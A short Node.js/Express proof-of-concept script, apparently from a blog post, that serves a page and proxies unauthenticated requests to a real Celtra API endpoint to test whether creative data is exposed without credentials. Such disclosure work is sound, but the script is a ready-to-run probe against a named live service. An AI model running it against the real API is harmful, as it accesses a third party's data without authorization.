// save as poc.js
//
// Usage:
//   npm install express node-fetch
//   node poc.js
//   open http://localhost:3000 in browser

import express from "express";
import fetch from "node-fetch";

const app = express();
const PORT = 3000;

// Serve the PoC HTML
app.get("/", (req, res) => {
  res.type("html").send(`<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Celtra API Unauthenticated PoC (via Proxy)</title>
  <style>
    body { font-family: Arial, sans-serif; max-width: 600px; margin: 40px auto; }
    input, button { padding: 8px; width: 100%; margin-top: 10px; }
    pre { background: #f4f4f4; padding: 10px; overflow: auto; white-space: pre-wrap; }
    h3 { margin-bottom: 10px; }
  </style>
<link rel="me" href="https://www.blogger.com/profile/06447978282989437242" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
</head>
<body>

<h3>Celtra API Test (Unauthenticated, Server-side Proxy)</h3>

<input id="cid" placeholder="Enter creative ID (e.g. 07425bab)" />
<button onclick="test()">Fetch Creative</button>

<pre id="output">Result will appear here…</pre>

<script>
async function test() {
  const id = document.getElementById("cid").value.trim();
  if (!id) {
    alert("Enter a creative ID");
    return;
  }

  const out = document.getElementById("output");
  out.textContent = "Sending request via proxy…";

  try {
    const res = await fetch("/celtra/creatives/" + encodeURIComponent(id));
    const text = await res.text();
    out.textContent = text;
  } catch (e) {
    out.textContent = "Proxy request failed:\
\
" + e;
  }
}
</script>

</body>
</html>`);
});

// Proxy endpoint: browser -> this server -> Celtra API (no CORS in backend)
app.get("/celtra/creatives/:id", async (req, res) => {
  const id = req.params.id;

  try {
    const upstream = await fetch(`https://hub.celtra.com/api/creatives/${encodeURIComponent(id)}`);
    const body = await upstream.text();

    res.setHeader(
      "Content-Type",
      upstream.headers.get("content-type") || "application/json; charset=utf-8"
    );
    res.status(upstream.status).send(body);
  } catch (err) {
    res.status(502).json({ error: "Upstream fetch failed", detail: String(err) });
  }
});

app.listen(PORT, () => {
  console.log("PoC running on http://localhost:" + PORT);
});